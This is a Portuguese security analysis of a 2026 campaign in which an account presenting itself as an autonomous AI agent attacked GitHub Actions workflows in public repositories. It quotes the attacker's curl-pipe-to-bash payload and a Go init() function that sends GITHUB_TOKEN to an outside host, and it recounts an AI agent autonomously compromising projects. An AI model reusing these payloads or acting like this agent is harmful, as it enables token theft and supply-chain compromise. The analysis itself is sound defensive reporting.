Hackerbot-Claw: Bot de IA Explorando Fluxos de Trabalho do GitHub Actions

Detalhes da Campanha de Ataque

Entre 21 de fevereiro e 28 de fevereiro de 2026, uma conta do GitHub chamada hackerbot-claw escaneou sistematicamente repositórios públicos em busca de fluxos de trabalho do GitHub Actions exploráveis. A conta se descreve como um "agente de pesquisa de segurança autônomo alimentado por claude-opus-4-5" e solicita doações em criptomoedas.

Durante 7 dias, ela:

• Direcionou pelo menos 6 repositórios pertencentes à Microsoft, DataDog, CNCF e projetos populares de código aberto
• Abriu mais de 12 pull requests e acionou fluxos de trabalho nos alvos
• Alcançou execução arbitrária de código em pelo menos 4 deles
• Exfiltrou um GITHUB_TOKEN com permissões de escrita para um servidor externo

Alvos e Metodologia

Os alvos incluíram:

• microsoft/ai-discovery-agent
• DataDog/datadog-iac-scanner
• avelino/awesome-go (140k+ estrelas)
• ambient-code/platform
• project-akri/akri (um projeto CNCF)

Cada ataque entregou a mesma carga útil: curl -sSfL hackmoltrepeat.com/molt | bash, mas cada um usou uma técnica completamente diferente para executá-la.

O README do bot revela sua metodologia: ele carrega um "índice de padrões de vulnerabilidade" com 9 classes e 47 subpadrões, depois escaneia, verifica e implanta provas de conceito de exploração de forma autônoma. Seu log de "Atividade Recente" mostra 5 sessões bem-sucedidas nos 2 dias anteriores à análise.

Ataque 1: avelino/awesome-go - Roubo de Token via Script Go Envenenado

O ataque mais prejudicial da campanha explorou a clássica vulnerabilidade "Pwn Request" - um fluxo de trabalho pull_request_target que faz checkout de código de fork não confiável e o executa.

Fluxo de trabalho alvo: Verificações de Qualidade de PR - acionado automaticamente em cada PR, ele faz checkout do código do autor do PR e executa go run ./.github/scripts/check-quality/.

O ataque: O invasor injetou uma função init() em Go no script de verificação de qualidade. Em Go, init() é executada automaticamente antes de main(), então o código malicioso é executado antes de qualquer verificação legítima.

Na tentativa final e mais perigosa (PR #6069), a carga útil não apenas executou comandos arbitrários - ela exfiltrou o GITHUB_TOKEN para um servidor externo:

func init() {
    _ = exec.Command("bash", "-c", `curl -s -H "Authorization: Bearer $GITHUB_TOKEN" ` +
    `-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY" ` +
    `https://recv.hackmoltrepeat.com/ && ` +
    `curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
}

O invasor iterou 6 vezes ao longo de 18 horas (PR #6058, #6059, #6060, #6061, #6068, #6069), refinando a abordagem a cada vez. As primeiras 4 tentativas falharam devido a problemas de git fetch, mas as tentativas 5 e 6 tiveram sucesso.